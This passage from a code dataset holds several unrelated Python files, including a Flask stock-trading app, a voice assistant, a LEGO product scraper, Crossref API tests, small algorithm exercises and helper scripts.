WHERE dia = :dia\", dia=dia)\n\n # print (ordenes[0][\"id_Operador\"])\n return render_template(\"index.html\", 
mordenes=ordenes,dia=dia)\n\n\n@app.route(\"/busca_operadores\")\ndef busca_operadores():\n \"\"\"Busca Operadores\"\"\"\n\n # retrieve q from HTML form\n q = request.args.get(\"q\") + \"%\"\n # Finds any postal code, city and state that start with q\n operadores = db.execute(\"SELECT * FROM operadores WHERE nombre LIKE :q\", q=q)\n return jsonify(operadores)\n\n@app.route(\"/carga\", methods=[\"GET\", \"POST\"])\n@login_required\ndef carga():\n if request.method == \"POST\":\n # empezamos a instanciar todo lo que trae el POST para insertar en DB\n\n tipo_Op = request.form.get(\"tipo_Op\")\n cantidad = request.form.get(\"cantidad\")\n tipo_Activo = request.form.get(\"tipo_Activo\")\n producto = request.form.get(\"producto\")\n mes = request.form.get(\"mes\")\n precio = request.form.get(\"precio\")\n al_Mercado = request.form.get(\"al_Mercado\")\n id_Cliente = request.form.get(\"id_Cliente\")\n A_C = \"\"\n if request.form.get(\"AC_abre\") == \"A\":\n A_C = \"A\"\n\n if request.form.get(\"AC_cancela\") == \"C\":\n A_C = \"C\"\n\n prima = request.form.get(\"prima\")\n id_Operador = request.form.get(\"id_Operador\")\n id_Metodo = request.form.get(\"id_Metodo\")\n id_Cliente = request.form.get(\"id_Cliente\")\n dia = datetime.date.today()\n hora = request.form.get(\"hora\")\n id_user = session[\"user_id\"]\n print (A_C)\n db.execute(\"INSERT INTO list_ord (tipo_Op, cantidad, tipo_Activo, producto, mes, precio, al_Mercado, id_Cliente, A_C, prima, id_Operador, id_Metodo, dia, hora, id_User) Values(:tipo_Op, :cantidad, :tipo_Activo, :producto, :mes, :precio, :al_Mercado, :id_Cliente, :A_C, :prima, :id_Operador, :id_Metodo, :dia, :hora, :id_user)\",\n tipo_Op=tipo_Op, cantidad=cantidad, tipo_Activo=tipo_Activo, producto=producto, mes=mes, precio=precio, al_Mercado=al_Mercado, id_Cliente=id_Cliente, A_C=A_C, prima=prima, id_Operador=id_Operador, id_Metodo=id_Metodo, dia=dia, hora=hora, id_user=id_user)\n\n return redirect(\"/\")\n\n else:\n return render_template(\"carga.html\")\n\n@app.route(\"/buy\", methods=[\"GET\", \"POST\"])\n@login_required\ndef buy():\n \"\"\"Buy shares of stock\"\"\"\n if request.method == \"POST\":\n if not request.form.get(\"symbol\"):\n return apology(\"must provide stock\", 400)\n if not request.form.get(\"shares\"):\n return apology(\"must provide quantity\", 400)\n\n try:\n cantidad = int(request.form.get(\"shares\"))\n except:\n return apology(\"shares must be a positive integer\", 400)\n\n if cantidad < 1:\n return apology(\"can´t buy zero or a negative number of shares\", 400)\n\n quote = lookup(request.form.get(\"symbol\"))\n if quote == None:\n return apology(\"stock not found\", 400)\n\n cash_remaining = db.execute(\"SELECT cash FROM users WHERE id = :userid\", userid=session[\"user_id\"])\n in_cash_remaining = cash_remaining[0][\"cash\"]\n\n if quote[\"price\"] * int(request.form.get(\"shares\")) > in_cash_remaining:\n return apology(\"not enough funds\", 400)\n\n else: # ejecutar insert\n userid = session[\"user_id\"]\n fecha = datetime.datetime.now()\n stock = quote[\"symbol\"]\n tipo = \"BUY\"\n precio = quote[\"price\"]\n volumen = quote[\"price\"] * int(request.form.get(\"shares\"))\n\n db.execute(\"INSERT INTO anotes (username, fecha, stock, tipo, cantidad, precio) Values(:username, :fecha, :stock, :tipo, :cantidad, :precio)\",\n username=userid, fecha=fecha, stock=stock, tipo=tipo, cantidad=cantidad, precio=precio)\n\n db.execute(\"UPDATE users SET cash = cash - :volumen where id = :userid\", volumen=volumen, userid=userid)\n\n cash_remaining = 
db.execute(\"SELECT cash FROM users WHERE id = :userid\", userid=session[\"user_id\"])\n in_cash_remaining = cash_remaining[0][\"cash\"]\n\n return redirect(\"/\")\n\n else:\n return render_template(\"buy.html\")\n\n\n@app.route(\"/history\")\n@login_required\ndef history():\n acciones_db = db.execute(\n \"SELECT fecha, stock, tipo, cantidad, precio FROM anotes WHERE username = :userid\", userid=session[\"user_id\"])\n\n cash_remaining = db.execute(\"SELECT cash FROM users WHERE id = :userid\", userid=session[\"user_id\"])\n in_cash_remaining = cash_remaining[0][\"cash\"]\n\n for i in acciones_db:\n quote = lookup(i[\"stock\"])\n i[\"name\"] = quote[\"name\"]\n\n return render_template(\"history.html\", acciones=acciones_db)\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n \"\"\"Log user in\"\"\"\n\n # Forget any user_id\n session.clear()\n\n # User reached route via POST (as by submitting a form via POST)\n if request.method == \"POST\":\n\n # Ensure username was submitted\n if not request.form.get(\"username\"):\n return apology(\"must provide username\", 403)\n\n # Ensure password was submitted\n elif not request.form.get(\"password\"):\n return apology(\"must provide password\", 403)\n\n # Query database for username\n rows = db.execute(\"SELECT * FROM users WHERE username = :username\",\n username=request.form.get(\"username\"))\n\n # Ensure username exists and password is correct\n if len(rows) != 1 or not check_password_hash(rows[0][\"hash\"], request.form.get(\"password\")):\n return apology(\"invalid username and/or password\", 403)\n\n # Remember which user has logged in\n session[\"user_id\"] = rows[0][\"id\"]\n\n # Redirect user to home page\n return redirect(\"/\")\n\n # User reached route via GET (as by clicking a link or via redirect)\n else:\n return render_template(\"login.html\")\n\n\n@app.route(\"/logout\")\ndef logout():\n \"\"\"Log user out\"\"\"\n\n # Forget any user_id\n session.clear()\n\n # Redirect user to login form\n return redirect(\"/\")\n\n\n@app.route(\"/quote\", methods=[\"GET\", \"POST\"])\n@login_required\ndef quote():\n \"\"\"Get stock quote.\"\"\"\n # User reached route via POST (as by submitting a form via POST)\n if request.method == \"POST\":\n if not request.form.get(\"symbol\"):\n return apology(\"must provide stock\", 400)\n\n quote = lookup(request.form.get(\"symbol\"))\n\n if quote == None:\n return apology(\"stock not found\", 400)\n\n return render_template(\"quoted.html\", name=quote[\"name\"], price=quote[\"price\"], symbol=quote[\"symbol\"])\n\n else:\n return render_template(\"quote.html\")\n\n\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n \"\"\"Register user\"\"\"\n # User reached route via POST (as by submitting a form via POST)\n # User reached route via POST (as by submitting a form via POST)\n if request.method == \"POST\":\n\n # Ensure username was submitted\n if not request.form.get(\"username\"):\n return apology(\"Nombre de Usuario requerido\", 400)\n\n # Ensure password was submitted\n elif not request.form.get(\"password\"):\n return apology(\"Contraseña requerida\", 400)\n\n elif not request.form.get(\"password\") == request.form.get(\"confirmation\"):\n return apology(\"La contraseña y su confirmación deben ser idénticas\", 400)\n\n existe = db.execute(\"SELECT * FROM users WHERE username = :username\",\n username=request.form.get(\"username\"))\n\n if len(existe) == 1:\n return apology(\"Usuario existente\", 400)\n # INSERT new username, and login (vía Session ID)\n\n 
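# NOTE: with the cs50 SQL library imported above, execute() on an INSERT returns the new row's primary key, so this assignment also logs the new user in\n        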
session[\"user_id\"] = db.execute(\"INSERT INTO users (username, hash) VALUES (:username, :hash_p)\",\n username=request.form.get(\"username\"), hash_p=generate_password_hash(request.form.get(\"password\")))\n\n return redirect(\"/\")\n\n # User reached route via GET (as by clicking a link or via redirect)\n else:\n return render_template(\"register.html\")\n\n\n@app.route(\"/sell\", methods=[\"GET\", \"POST\"])\n@login_required\ndef sell():\n \"\"\"Sell shares of stock\"\"\"\n if request.method == \"POST\":\n if not request.form.get(\"symbol\"):\n return apology(\"must provide stock\", 400)\n if not request.form.get(\"shares\"):\n return apology(\"must provide quantity\", 400)\n\n try:\n cantidad = int(request.form.get(\"shares\"))\n except:\n return apology(\"shares must be a positive integer\", 400)\n\n if cantidad < 1:\n return apology(\"can´t buy zero or a negative number of shares\", 400)\n\n quote = lookup(request.form.get(\"symbol\"))\n if quote == None:\n return apology(\"stock not found\", 400)\n\n acciones_db = db.execute(\"SELECT username, stock, SUM(cantidad) AS cant_total FROM anotes WHERE username = :userid and stock = :stock GROUP BY stock\",\n userid=session[\"user_id\"], stock=request.form.get(\"symbol\"))\n if len(acciones_db) == 0:\n return apology(\"stock not found\", 400)\n\n if acciones_db[0][\"cant_total\"] < int(request.form.get(\"shares\")):\n return apology(\"not enough shares to sell\", 400)\n\n else: # ejecutar insert\n userid = session[\"user_id\"]\n fecha = datetime.datetime.now()\n stock = quote[\"symbol\"]\n tipo = \"SELL\"\n cantidad = int(request.form.get(\"shares\"))\n precio = quote[\"price\"]\n volumen = quote[\"price\"] * cantidad\n\n db.execute(\"INSERT INTO anotes (username, fecha, stock, tipo, cantidad, precio) Values(:username, :fecha, :stock, :tipo, :cantidad, :precio)\",\n username=userid, fecha=fecha, stock=stock, tipo=tipo, cantidad=cantidad * -1, precio=precio)\n\n db.execute(\"UPDATE users SET cash = cash + :volumen where id = :userid\", volumen=volumen, userid=userid)\n\n cash_remaining = db.execute(\"SELECT cash FROM users WHERE id = :userid\", userid=session[\"user_id\"])\n in_cash_remaining = cash_remaining[0][\"cash\"]\n return redirect(\"/\")\n\n else:\n\n acciones_db = db.execute(\n \"SELECT stock, SUM(cantidad) AS cant_total FROM anotes WHERE username = :userid GROUP BY stock HAVING cant_total > 0\", userid=session[\"user_id\"])\n return render_template(\"sell.html\", acciones=acciones_db)\n\n\ndef errorhandler(e):\n \"\"\"Handle error\"\"\"\n return apology(e.name, e.code)\n\n\n# listen for errors\nfor code in default_exceptions:\n app.errorhandler(code)(errorhandler)","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":12229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"333496661","text":"def get_name():\n \"\"\"获取文件所在目录\"\"\"\n import os\n path = input(\"请输入初始化路径: \")\n name_cmd = input(\"请输入要查找的文件: \")\n list1 = list(os.walk(path, topdown=True))\n is_False = False\n for name in list1:\n for name2 in name[2]:\n if name2 == name_cmd:\n is_False = True\n print(name[0] + \"\\\\\"+name_cmd)\n if is_False is False:\n print(\"当前目录不存在此文件\")\n","sub_path":"代码/02-小甲鱼/01-列表/12-获取文件所在目录.py","file_name":"12-获取文件所在目录.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"434041120","text":"import pyttsx3\nimport datetime\nimport speech_recognition as 
sr\nimport wikipedia\nimport webbrowser\nimport os\n\nengine = pyttsx3.init()\nvoice = engine.getProperty('voices')\nengine.setProperty('voice', voice[1].id)\n\n\n\ndef speak(audio):\n    engine.say(audio)\n    engine.runAndWait()\n\n\ndef wishme():\n    hour=int(datetime.datetime.now().hour)\n    if hour>=0 and hour<12:\n        speak(\"Good morning Sir\")\n    elif hour>=12 and hour<18:\n        speak(\"Good afternoon sir\")\n    else:\n        speak(\"good evening sir\")\n\n    speak(\"Hello, I am your Jarvis. What can I do for you, Sir?\")\n\n\ndef takeCommand():\n    # It takes microphone input from the user and returns string output\n\n    r = sr.Recognizer()\n    with sr.Microphone() as source:\n        print(\"Listening...\")\n        r.pause_threshold = .5\n        audio = r.listen(source)\n\n    try:\n        print(\"Recognizing...\")\n        query = r.recognize_google(audio, language='en-in')\n        print(f\"User said: {query}\\n\")\n\n    except Exception as e:\n        # print(e)\n        speak(\"Say that again please...\")\n        return \"None\"\n    return query\n\n\nif __name__ == '__main__':\n    volume = engine.getProperty('volume')\n    print(volume)\n    rate=engine.getProperty('rate')\n    engine.setProperty('rate',175)\n    print(rate)\n    wishme()\n    while True:\n        query = takeCommand().lower()\n        if \"wikipedia\" in query:\n            speak(\"Searching wikipedia\")\n            query = query.replace(\"wikipedia\", \"\")\n            results = wikipedia.summary(query, sentences=2)\n            speak(\"According to wikipedia\")\n            print(results)\n            speak(results)\n        elif \"thanks\" in query:\n            speak(\"Never mind sir\")\n        elif \"time\" in query:\n            strtime = datetime.datetime.now().strftime(\"%H:%M:%S\")\n            speak(\"Sir the time is\")\n            speak(strtime)\n        elif (\"open youtube\" in query) or (\"youtube\" in query):\n            webbrowser.open(\"www.youtube.com\")\n        elif (\"open facebook\" in query) or (\"facebook\" in query):\n            webbrowser.open(\"www.facebook.com\")\n        elif (\"open instagram\" in query) or (\"instagram\" in query):\n            webbrowser.open(\"www.instagram.com\")\n        elif \"open hackerrank\" in query:\n            webbrowser.open(\"www.hackerrank.com\")\n        elif \"open hackerone\" in query:\n            webbrowser.open(\"www.hackerone.com\")\n        elif \"open flipkart\" in query:\n            webbrowser.open(\"www.flipkart.com\")\n        elif (\"open google\" in query) or (\"google\" in query):\n            webbrowser.open(\"www.google.com\")\n\n        elif \"open pycharm\" in query:\n            path = \"C:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition 2020.2\\\\bin\\\\pycharm64.exe\"\n            os.startfile(path)\n        elif \"open burp suite\" in query:\n            path = \"C:\\\\Users\\\\Batukeshwar\\\\Downloads\\\\burpsuite_pro_windows-x64_v2020_7.exe\"\n            os.startfile(path)\n","sub_path":"assistant.py","file_name":"assistant.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"278716987","text":"def conversion(strc):\n\tcvtable=[(0,'ZERO','Z'),(8,'EIGHT','G'),(6,'SIX','X'),(2,'TWO','W'),(4,'FOUR','U'),(1,'ONE','O'),(3,'THREE','H'),(5,'FIVE','F'),(7,'SEVEN','V'),(9,'NINE','I')]\n\trst=[]\n\tslen=len(strc)\n\tdata=[]\n\tfor i in range(slen):\n\t\tdata.append(strc[i])\n\tfor cvitem in cvtable:\n\t\tcount=data.count(cvitem[2])\n\t\tfor i in range(count):\n\t\t\trst.append(str(cvitem[0]))\n\t\tfor i in range(count):\n\t\t\ttemplen=len(cvitem[1])\n\t\t\tfor j in range(templen):\n\t\t\t\tix=data.index(cvitem[1][j])\n\t\t\t\tdata[ix]='-'\n\trst.sort()\n\tresult=''.join(rst)\n\treturn result\n\ndef phonenum(inputfile, outputfile):\n\tfr=open(inputfile,'r')\n\tT=int(fr.readline())\n\tprint(T,' cases.')\n\tfw=open(outputfile,'w')\n\tfor j in 
range(T):\n\t\tstrc=fr.readline()\n\t\tstrd=conversion(strc)\n\t\ts='Case #'+str(j+1)+': '+strd+'\\n'\n\t\tfw.write(s)\n\tfw.close()\n\tfr.close()\n\treturn\n","sub_path":"codes/CodeJamCrawler/16_2_1_neat/16_2_1_onefivefive_phonenum.py","file_name":"16_2_1_onefivefive_phonenum.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"223095223","text":"import urllib.request\nimport os.path\nimport shutil\n\nfrom bs4 import BeautifulSoup\nimport requests\n\ndef download(id):\n output_filename = os.path.join(\"media\",f\"cart_{id}.gif\")\n # Don't need to redownload. Save resources on Tic80\n if not os.path.exists(output_filename):\n url = f'https://tic80.com/play?cart={id}'\n req = requests.get(url)\n soup = BeautifulSoup(req.content,'html5lib')\n img = soup.find(\"meta\",{'property':\"og:image\"})\n img = img.attrs.get('content')\n r = requests.get(img, stream=True)\n if r.status_code == 200:\n with open(output_filename, 'wb') as f:\n r.raw.decode_content = True\n shutil.copyfileobj(r.raw, f) \ndef find_cart_id(event):\n for phase in event['phases']:\n for entry in phase['entries']:\n yield entry.get('tic80_cart_id', None)\n\ndef create_cache(event):\n tic80_carts = [ cart_id for cart_id in find_cart_id(event) if cart_id]\n for cart_id in tic80_carts:\n download(cart_id)","sub_path":"bin/download_tic80_cart_overview.py","file_name":"download_tic80_cart_overview.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"359017752","text":"\"\"\"Tests for Crossref.types\"\"\"\nimport os\nimport vcr\nimport pytest\n\nfrom habanero import exceptions\n\nfrom habanero import Crossref\n\ncr = Crossref()\n\na = {\n u\"items\": [\n {u\"id\": u\"book-section\", u\"label\": u\"Book Section\"},\n {u\"id\": u\"monograph\", u\"label\": u\"Monograph\"},\n {u\"id\": u\"report\", u\"label\": u\"Report\"},\n {u\"id\": u\"peer-review\", u\"label\": u\"Peer Review\"},\n {u\"id\": u\"book-track\", u\"label\": u\"Book Track\"},\n {u\"id\": u\"journal-article\", u\"label\": u\"Journal Article\"},\n {u\"id\": u\"book-part\", u\"label\": u\"Part\"},\n {u\"id\": u\"other\", u\"label\": u\"Other\"},\n {u\"id\": u\"book\", u\"label\": u\"Book\"},\n {u\"id\": u\"journal-volume\", u\"label\": u\"Journal Volume\"},\n {u\"id\": u\"book-set\", u\"label\": u\"Book Set\"},\n {u\"id\": u\"reference-entry\", u\"label\": u\"Reference Entry\"},\n {u\"id\": u\"proceedings-article\", u\"label\": u\"Proceedings Article\"},\n {u\"id\": u\"journal\", u\"label\": u\"Journal\"},\n {u\"id\": u\"component\", u\"label\": u\"Component\"},\n {u\"id\": u\"book-chapter\", u\"label\": u\"Book Chapter\"},\n {u\"id\": u\"report-series\", u\"label\": u\"Report Series\"},\n {u\"id\": u\"proceedings\", u\"label\": u\"Proceedings\"},\n {u\"id\": u\"standard\", u\"label\": u\"Standard\"},\n {u\"id\": u\"reference-book\", u\"label\": u\"Reference Book\"},\n {u\"id\": u\"posted-content\", u\"label\": u\"Posted Content\"},\n {u\"id\": u\"journal-issue\", u\"label\": u\"Journal Issue\"},\n {u\"id\": u\"dissertation\", u\"label\": u\"Dissertation\"},\n {u\"id\": u\"dataset\", u\"label\": u\"Dataset\"},\n {u\"id\": u\"book-series\", u\"label\": u\"Book Series\"},\n {u\"id\": u\"edited-book\", u\"label\": u\"Edited Book\"},\n {u\"id\": u\"standard-series\", u\"label\": u\"Standard Series\"},\n ],\n u\"total-results\": 
27,\n}\n\n\n@vcr.use_cassette(\"test/vcr_cassettes/types.yaml\")\ndef test_types():\n \"types - basic test\"\n res = cr.types()\n assert dict == res.__class__\n assert dict == res[\"message\"].__class__\n assert a == res[\"message\"]\n\n\n@vcr.use_cassette(\"test/vcr_cassettes/types_query.yaml\")\ndef test_types_query():\n \"types - param: query - doesn't do anything without works\"\n res = cr.types(query=\"journal\")\n assert a == res[\"message\"]\n\n\n@vcr.use_cassette(\"test/vcr_cassettes/types_ids.yaml\")\ndef test_types_ids():\n \"types - param: ids\"\n res = cr.types(ids=\"journal\")\n assert dict == res.__class__\n assert {u\"id\": u\"journal\", u\"label\": u\"Journal\"} == res[\"message\"]\n\n\n@vcr.use_cassette(\"test/vcr_cassettes/types_works.yaml\")\ndef test_types_works():\n \"types - param: works\"\n res = cr.types(ids=\"journal\", works=True, limit=2)\n assert dict == res.__class__\n assert \"work-list\" == res[\"message-type\"]\n\n\n# FIXME: not sure why, but the line where we get titles obj is failing with\n# UnicodeEncodeError: 'ascii' codec can't encode character u'\\u2019' in position 109: ordinal not in range(128)\n# def test_types_field_queries():\n# \"types - param: kwargs - field queries work as expected\"\n# res = cr.types(ids = \"journal-article\", works = True, query_bibliographic = 'gender', rows = 20)\n# titles = [ str(x.get('title')[0]) for x in res['message']['items'] ]\n# assert dict == res.__class__\n# assert 5 == len(res['message'])\n# assert list == titles.__class__\n# assert str == titles[0].__class__\n\n\n@vcr.use_cassette(\"test/vcr_cassettes/types_filters_not_allowed_with_typeid.yaml\")\ndef test_types_query_filters_not_allowed_with_typeid():\n \"types - param: kwargs - query filters not allowed on types/type/ route\"\n with pytest.raises(exceptions.RequestError):\n cr.types(ids=\"journal-article\", query_bibliographic=\"gender\")\n\n\n@vcr.use_cassette(\"test/vcr_cassettes/types_query_title_not_allowed_anymore.yaml\")\ndef test_types_query_title_not_allowed_anymore():\n \"types - param: kwargs - query_title query not allowed anymore\"\n with pytest.raises(exceptions.RequestError):\n cr.types(works=True, query_title=\"cellular\")\n","sub_path":"test/test-types.py","file_name":"test-types.py","file_ext":"py","file_size_in_byte":3971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"227981961","text":"from zope.interface import Interface\n# -*- Additional Imports Here -*-\nfrom zope import schema\n\nfrom ebc.automator import automatorMessageFactory as _\n\n\n\nclass IInfoOlimpiadas(Interface):\n \"\"\"InfoOlimpiadas\"\"\"\n\n # -*- schema definition goes here -*-\n mensagem = schema.TextLine(\n title=_(u\"Mensagem\"),\n required=True,\n description=_(u\"Field description\"),\n )\n#\n credito = schema.TextLine(\n title=_(u\"Credito\"),\n required=True,\n description=_(u\"Field description\"),\n )\n#\n","sub_path":"ebc/automator/interfaces/infoolimpiadas.py","file_name":"infoolimpiadas.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"438859142","text":"import numpy as np\n\nprefix = 'C:/Users/CTK_CAD/Chalmers Teknologkonsulter AB/Bird Classification - Images/Bird Detection - Images/Original images/'\nannotationsfile = prefix + 'test_drones.txt'\n\nclass_counter = np.zeros((1,3))\n\n\nwith open(annotationsfile) as f:\n lines = f.readlines()\nfor line in lines:\n boxes = line.split()[1:]\n for box in 
boxes:\n        l,t,r,b,c = box.split(',')\n        class_counter[0,int(c)] += 1\n\n\nfor i in range(3):\n    print(class_counter[0,i])","sub_path":"countClassFreq.py","file_name":"countClassFreq.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"198037377","text":"# Partition: Write code to partition a linked list around a value x, \n# such that all nodes less than x come before all nodes greater than \n# or equal to x. If x is contained within the list, the values of x \n# only need to be after the elements less than x (see below). \n# The partition element x can appear anywhere in the \"right partition\"; \n# it does not need to appear between the left and right partitions.\n\n# SOLUTION\n# EXAMPLE\n# Input: \t3 -> 5 -> 8 -> 5 -> 10 -> 2 -> 1 [partition=5] \n# Output: \t3 -> 1 -> 2 -> 10 -> 5 -> 5 -> 8\n\n\nclass Node():\n\tdef __init__(self, data, next=None):\n\t\tself.data = data\n\t\tself.next = next\n\n\ndef partitionNode(head, target):\n\t# pl1/pl2 track the head and tail of the \"less than\" list,\n\t# pr1/pr2 the head and tail of the \"greater or equal\" list\n\tpl1, pl2, pr1, pr2 = None, None, None, None\n\n\tnode = head\n\n\twhile node:\n\t\tif node.data < target:\t# send to left list\n\t\t\tif pl1:\n\t\t\t\tpl2.next = node\n\t\t\t\tpl2 = node\n\t\t\telse:\n\t\t\t\tpl1 = node\n\t\t\t\tpl2 = node\n\t\telse:\t# send to right list\n\t\t\tif pr1:\n\t\t\t\tpr2.next = node\n\t\t\t\tpr2 = node\n\t\t\telse:\n\t\t\t\tpr1 = node\n\t\t\t\tpr2 = node\n\t\tnode = node.next\n\tif pr2:\n\t\tpr2.next = None\t# terminate the right list, otherwise the merged list can contain a cycle\n\tif pl2:\n\t\tpl2.next = pr1\t# merging the two lists\n\t\treturn pl1\n\treturn pr1\n\ndef printList(head):\n\tif head:\n\t\tprint(head.data)\n\t\tprintList(head.next)\n\n\n#Start\n\nlist1 = Node(3,Node(5,Node(8,Node(5,Node(10,Node(2,Node(1)))))))\n# expected Output: \t3 -> 1 -> 2 -> 10 -> 5 -> 5 -> 8\n\nprintList(partitionNode(list1, 5))\n","sub_path":"CTCI_book/CH2 - Linked lists/2.4.py","file_name":"2.4.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"557053863","text":"class Solution(object):\n    def fourSum(self, nums, target):\n        \"\"\"\n        :type nums: List[int]\n        :type target: int\n        :rtype: List[List[int]]\n        \"\"\"\n        res = []\n        for i,n in enumerate(nums):\n            three = self.threeSum(nums[i + 1:], target - n)\n            if three:\n                four = [ sorted(x + [n]) for x in three ]\n                for f in four:\n                    if f not in res:\n                        res += f,\n        return res\n\n\n    def threeSum(self, nums, target):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: List[List[int]]\n        \"\"\"\n        res = []\n        for i,n in enumerate(nums):\n            two = self.twoSum(nums[i + 1:], target - n)\n            if two:\n                three = [ sorted(x + [n]) for x in two ]\n                for t in three:\n                    if t not in res:\n                        res += t,\n        return res\n\n\n    def twoSum(self, nums, target):\n        got = {}\n        res = []\n        for n in nums:\n            if n not in got:\n                got[target - n] = n\n            else:\n                res += [got[n], n],\n        return res","sub_path":"fourSum.py","file_name":"fourSum.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"249706857","text":"#-*-coding:utf-8-*-\nimport requests, re, json\nfrom bs4 import BeautifulSoup\n\nclass Lego:\n\n    def __init__(self):\n        # self.url = url\n        self.session = requests.Session()\n\n    def get_single_page(self, url):\n        
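\"\"\"Fetch a single product page and return its scraped fields as a dict.\"\"\"\n        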
self.url = url\n data = self.crawler_exec()\n\n return data\n def get_price(self, res):\n \"return product price\"\n print(res.text)\n self.soup = BeautifulSoup(res.text, 'lxml')\n price_ele = self.soup.find('span', {'class': re.compile('ProductPrice.+')})\n if price_ele is None:\n return -1\n r = re.compile(r'[0-9]+\\.[0-9]+')\n result = r.search(price_ele.text)\n if result:\n return result.group()\n return -1\n\n def get_main_images(self):\n \"return product image\"\n image_eles = self.soup.find_all('img', re.compile('Thumbnail__Image.+'))\n result = []\n for ele in image_eles:\n result.append(ele.attrs['src'])\n return result\n\n def get_content_images(self):\n main_contetn_ele = self.soup.find('div', {'class': re.compile('ProductDynamicContent.+')})\n if main_contetn_ele is None:\n return -1\n picture_parents_ele = main_contetn_ele.find_all('picture', {'class': re.compile('HeroBannerstyles__HeroPicture.+')})\n result_list = []\n for par_ele in picture_parents_ele:\n source_eles = par_ele.find_all('source')\n for source in source_eles:\n result_list.append(source.attrs['srcset'])\n return result_list\n\n def get_tag(self):\n result_list = []\n for item_ele in self.soup.find_all('span', {'class': re.compile('ProductBadge__StyledBadge.+')}):\n result_list.append(item_ele.text)\n\n return result_list\n\n def get_title(self):\n title_ele = self.soup.find('h1', {'itemprop': 'name'})\n return title_ele.text\n\n def get_specifications(self):\n result = {}\n content_ele = self.soup.find('div', {'class': re.compile('ProductFeaturesstyles__Copy.+')})\n\n content_text = content_ele.text\n result.update({'main': content_text})\n bullet_ele = self.soup.find('div', {'class': re.compile('ProductFeaturesstyles__BulletText.+')})\n if bullet_ele is None:\n return -1\n bullet_text = []\n\n for li_ele in bullet_ele.find_all('li'):\n bullet_text.append(li_ele.text)\n result.update({'bullet': bullet_text})\n cta_ele = self.soup.find('div', {'class': re.compile('ProductFeaturesstyles__Cta.+')})\n try:\n cta_img_ele = cta_ele.find('img')\n result.update({'cta_img': cta_img_ele.attrs['src']})\n except Exception as e:\n print(str(e))\n return result\n\n def get_currency(self, res):\n \"return product currency\"\n self.soup = BeautifulSoup(res.text, 'lxml')\n if self.soup.find('meta', property=\"product:price:currency\")[\"content\"] == \"\":\n return -1\n return self.soup.find('meta', property=\"product:price:currency\")[\"content\"]\n\n def crawler_exec(self):\n # 回傳 圖片、說明、價格、文字、幣別的Json\n res = self.session.get(self.url)\n price = self.get_price(res)\n title = self.get_title()\n main_images = self.get_main_images()\n content_images = self.get_content_images()\n # tags = self.get_tag()\n spec = self.get_specifications()\n\n # currency\n currency = self.get_currency(res)\n\n key_list = ['title', 'price', 'tags', 'colors', 'size', 'main_images', 'content_images', 'currency', 'url', 'description', 'collection', 'in_stock']\n data = {key: -1 for key in key_list}\n datas = {\"price\": price,\n \"title\": title,\n \"main_images\": main_images,\n \"content_images\": content_images,\n \"currency\": currency\n }\n data.update(datas)\n return data\n\n\nif __name__ == '__main__':\n url = 'https://www.lego.com/tr-tr/product/land-rover-defender-42110'\n # data = Lego(url).crawler_exec()\n data = Lego().get_single_page(url)\n print(data)\n\n #save dict as json file\n with open(f\"{data['title']}.json\", \"w\") as f:\n f.write(json.dumps(data, sort_keys=True, 
indent=4))\n","sub_path":"WaterGuanyin/buy_spider/craw_module/Lego.py","file_name":"Lego.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"583576222","text":"import requests\n\nfrom django.conf import settings\n\nimport utils.requester as Requester\n\nDATA_CATALOG_API_URL = \"https://data.opendatasoft.com/api/datasets/1.0/{}/\"\nDATA_CATALOG_API_SEARCH_URL = \"https://data.opendatasoft.com/api/datasets/1.0/search/\"\nDATA_CATALOG_API_SEARCH_V2_URL = \"https://data.opendatasoft.com/api/v2/catalog/datasets/\"\n\n\nclass DatasetIdMissing(Exception):\n pass\n\n\ndef dataset_meta_request(dataset_id):\n if dataset_id:\n params = {'apikey': settings.DATA_API_KEY}\n request = requests.get(DATA_CATALOG_API_URL.format(dataset_id), params, timeout=Requester.get_timeout(), headers=Requester.create_ods_headers())\n request.raise_for_status()\n return request.json()\n else:\n raise DatasetIdMissing\n\n\ndef datasets_meta_request(start=0, rows=100):\n params = {'start': start, 'rows': rows, 'apikey': settings.DATA_API_KEY}\n request = requests.get(DATA_CATALOG_API_SEARCH_URL, params, timeout=Requester.get_timeout(), headers=Requester.create_ods_headers())\n request.raise_for_status()\n return request.json()\n\n\ndef datasets_search_v2(search='', rows=10, sort='explore.popularity_score'):\n params = {'search': search, 'rows': rows, 'sort': sort, 'apikey': settings.DATA_API_KEY}\n request = requests.get(DATA_CATALOG_API_SEARCH_V2_URL, params, timeout=Requester.get_timeout(), headers=Requester.create_ods_headers())\n request.raise_for_status()\n return request.json()\n","sub_path":"utils/ods_catalog_api.py","file_name":"ods_catalog_api.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"48295646","text":"import os\nimport json\nfrom distutils.util import strtobool as stb\n\n# --------------------------------------\nBOT_TOKEN = 